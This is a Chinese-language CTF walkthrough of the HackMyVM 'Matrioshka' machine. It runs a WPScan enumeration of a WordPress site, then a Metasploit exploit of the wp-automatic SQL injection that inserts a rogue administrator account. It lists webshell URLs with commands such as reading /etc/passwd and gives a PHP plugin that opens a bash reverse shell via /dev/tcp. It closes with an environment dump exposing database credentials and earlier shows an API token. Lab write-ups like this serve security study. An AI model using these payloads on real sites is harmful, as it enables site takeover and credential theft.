hackmyvm_Matrioshka

扫描

先将域名添加进hosts文件

是个wordpress

扫描网站

┌──(root㉿kali)-[/myift/Matr]
└─# wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "w37ueOSrhj3dG2sKNoaWQBgoq6tRjQ11as06z288k7U"

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
 

[+] URL: http://mamushka.hmv/ [192.168.56.105]
[+] Started: Sat May 24 09:29:05 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.61 (Debian)
 |  - X-Powered-By: PHP/8.2.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:09 <==================================================================================================================================> (700 / 700) 100.00% Time: 00:00:09
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyfour
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.3
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:06:10 <===================================================================                                                            > (55860 / 103783) 53.82%  ETA: 00:05:17
 Checking Known Locations - Time: 00:08:19 <=============================================================================================================================> (103783 / 103783) 100.00% Time: 00:08:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://mamushka.hmv/wp-content/plugins/akismet/
 | Latest Version: 5.4
 | Last Updated: 2025-05-07T16:30:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] meta-generator-and-version-info-remover
 | Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
 | Latest Version: 16.0 (up to date)
 | Last Updated: 2024-11-20T05:03:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
 |
 | Version: 16.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt

[+] ultimate-member
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
 | Last Updated: 2025-05-14T22:48:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | [!] The version is out of date, the latest version is 2.10.4
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
 |
 | [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
 |
 | [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
 |     Fixed in: 2.9.0
 |     References:
 |      - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
 |
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
 |
 | [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
 |
 | [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
 |     Fixed in: 2.10.0
 |     References:
 |      - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
 |
 | [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
 |     Fixed in: 2.10.1
 |     References:
 |      - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
 |
 | [!] Title: Ultimate Member <= 2.10.3 - Admin+ Arbitrary Function Call
 |     Fixed in: 2.10.4
 |     References:
 |      - https://wpscan.com/vulnerability/abc6e35c-d971-4c8f-bcd0-70c7e16ec067
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47691
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8b33c7-23ef-4b5c-bdb9-b4e548d18832
 |
 | Version: 2.8.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] wp-automatic
 | Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
 | Latest Version: 3.115.0
 | Last Updated: 2025-05-20T04:08:41.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
 |     Fixed in: 2.0.4
 |     References:
 |      - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
 |      - https://www.exploit-db.com/exploits/19187/
 |      - https://packetstormsecurity.com/files/113763/
 |
 | [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
 |     Fixed in: 3.53.3
 |     References:
 |      - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
 |      - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
 |
 | [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
 |
 | [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
 |     Fixed in: 3.93.0
 |     References:
 |      - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
 |
 | [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
 |     Fixed in: 3.95.0
 |     References:
 |      - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
 |
 | The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 5
 | Requests Remaining: 20

[+] Finished: Sat May 24 09:39:28 2025
[+] Requests Done: 105129
[+] Cached Requests: 19
[+] Data Sent: 28.118 MB
[+] Data Received: 43.189 MB
[+] Memory used: 456.652 MB
[+] Elapsed time: 00:10:22

根据扫描信息得知我们可以利用

Automatic 插件

CVE-2024-27956未授权SQL注入漏洞

也可以利用

nuclei -target http://mamushka.hmv

这里直接用msf的payload即可

注意因为这个漏洞并不能达到完整利用(因为新版的wordpress是不允许上传php文件)也就是不能得到shell所以模块的自动检测机制无法确定目标是否存在漏洞

我们关掉这个自动检查他就会一步一步的向下进行虽然无法得到shell但是可以成功得到管理员用户

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[*] Started reverse TCP handler on 192.168.56.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[*] Started reverse TCP handler on 192.168.56.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[!] The target is not exploitable. Target is not vulnerable or the SQLi test failed. ForceExploit is enabled, proceeding with exploitation.
[*] {SQLi} Executing (SELECT 17 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 17 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {SQLi} Time-based injection: expecting output of length 0
[*] {WPSQLi} Default prefix not found, attempting to detect custom table prefix...
[*] {SQLi} Executing (SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE '%\_users' AND (SELECT COUNT(*) FROM information_schema.columns i WHERE i.table_schema = tables.table_schema AND i.table_name = tables.table_name AND i.column_name IN ('user_login', 'user_pass') ) = 2 LIMIT 1)
[*] {SQLi} Encoded to (SELECT LEFT(table_name, LENGTH(table_name) - LENGTH(0x7573657273)) FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE 0x255c5f7573657273 AND (SELECT COUNT(*) FROM information_schema.columns i WHERE i.table_schema = tables.table_schema AND i.table_name = tables.table_name AND i.column_name IN (0x757365725f6c6f67696e, 0x757365725f70617373) ) = 2 LIMIT 1)
[*] {SQLi} Time-based injection: expecting output of length 2
[*] {WPSQLi} Custom table prefix detected: 'Ep'
[*] {SQLi} Executing (INSERT INTO Epusers (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) SELECT 'myift.123', MD5('myift.123'), 'myift.123', 'krysten_schuster@pfannerstill.example', user_registered, user_status, 'myift.123' FROM Epusers WHERE NOT EXISTS ( SELECT 1 FROM Epusers WHERE user_login = 'myift.123' ) LIMIT 1 ON DUPLICATE KEY UPDATE user_pass = MD5('myift.123'), user_nicename = 'myift.123', user_email = 'krysten_schuster@pfannerstill.example', display_name = 'myift.123')
[*] {SQLi} Encoded to (INSERT INTO Epusers (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) SELECT 0x6d796966742e313233, MD5(0x6d796966742e313233), 0x6d796966742e313233, 0x6b72797374656e5f7363687573746572407066616e6e65727374696c6c2e6578616d706c65, user_registered, user_status, 0x6d796966742e313233 FROM Epusers WHERE NOT EXISTS ( SELECT 1 FROM Epusers WHERE user_login = 0x6d796966742e313233 ) LIMIT 1 ON DUPLICATE KEY UPDATE user_pass = MD5(0x6d796966742e313233), user_nicename = 0x6d796966742e313233, user_email = 0x6b72797374656e5f7363687573746572407066616e6e65727374696c6c2e6578616d706c65, display_name = 0x6d796966742e313233)
[*] {WPSQLi} User 'myift.123' created or updated successfully.
[*] {SQLi} Executing (INSERT INTO Epusermeta (user_id, meta_key, meta_value) SELECT ID, 'Epcapabilities', 'a:1:{s:13:"administrator";s:1:"1";}' FROM Epusers WHERE user_login = 'myift.123' ON DUPLICATE KEY UPDATE meta_value = 'a:1:{s:13:"administrator";s:1:"1";}')
[*] {SQLi} Encoded to (INSERT INTO Epusermeta (user_id, meta_key, meta_value) SELECT ID, 0x45706361706162696c6974696573, 0x613a313a7b733a31333a2261646d696e6973747261746f72223b733a313a2231223b7d FROM Epusers WHERE user_login = 0x6d796966742e313233 ON DUPLICATE KEY UPDATE meta_value = 0x613a313a7b733a31333a2261646d696e6973747261746f72223b733a313a2231223b7d)
[*] {WPSQLi} Admin privileges granted or updated for user 'myift.123'.
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
[*] Exploit completed, but no session was created.

这里要获得shell可以上传恶意插件例如我们直接上传一个压缩后的反弹shell恶意文件

上传后直接直接激活即可得到shell我们可以直接利用wordpwn.py

✅ 使用流程
① 执行脚本

python wordpwn.py 192.168.0.6 8888 Y

192.168.0.6 是你的监听 IP；

8888 是监听端口；

Y 表示自动启动 Metasploit Handler（相当于执行了 msfconsole -x use exploit/multi/handler ...）。

生成后，会在当前目录得到：


malicious.zip  ← 插件文件，内含反弹 shell 和 WebShell
② 上传插件
访问 WordPress 插件上传页面（登录后台后）：

http://<目标IP>/wp-admin/plugin-install.php?tab=upload
上传 malicious.zip，然后点击“启用插件”。

③ 执行 shell（两种方式）
反弹连接：

你需要提前监听反向连接（或者由 wordpwn.py 启动的 handler 已在监听）；

一旦启用插件，它会发起连接到你的机器。

Webshell（备用/稳定访问）
可访问以下页面执行命令：

http://<目标IP>/wp-content/plugins/malicious/wetw0rk_maybe.php
http://<目标IP>/wp-content/plugins/malicious/QwertyRocks.php
http://<目标IP>/wp-content/plugins/malicious/SWebTheme.php?cmd=ls
最后一条 URL 是具备 cmd 参数功能的 WebShell，你可以换成：

?cmd=cat /etc/passwd
?cmd=whoami
?cmd=uname -a

参考:

https://github.com/wetw0rk/malicious-wordpress-plugin

https://www.hackingarticles.in/wordpress-reverse-shell/

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html?highlight=wordpress

也可以自己搞一个zip文件

<?php
/**
 * Plugin Name: GetRev
 * Version: 10.8.1
 * Author: PwnedSauce
 * Author URI: http://PwnedSauce.com
 * License: GPL2
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'")
?>

然后压缩为zip文件上传为插件即可

终于拿到shell了我cao了

这个靶机上传插件这里非常卡

而且wordpwn.py这个方法一直拿不到shell不知道是什么原因

当前为docker环境

www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
env
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             libc-dev                make            pkg-config              re2c
TERM=hash
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=4
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env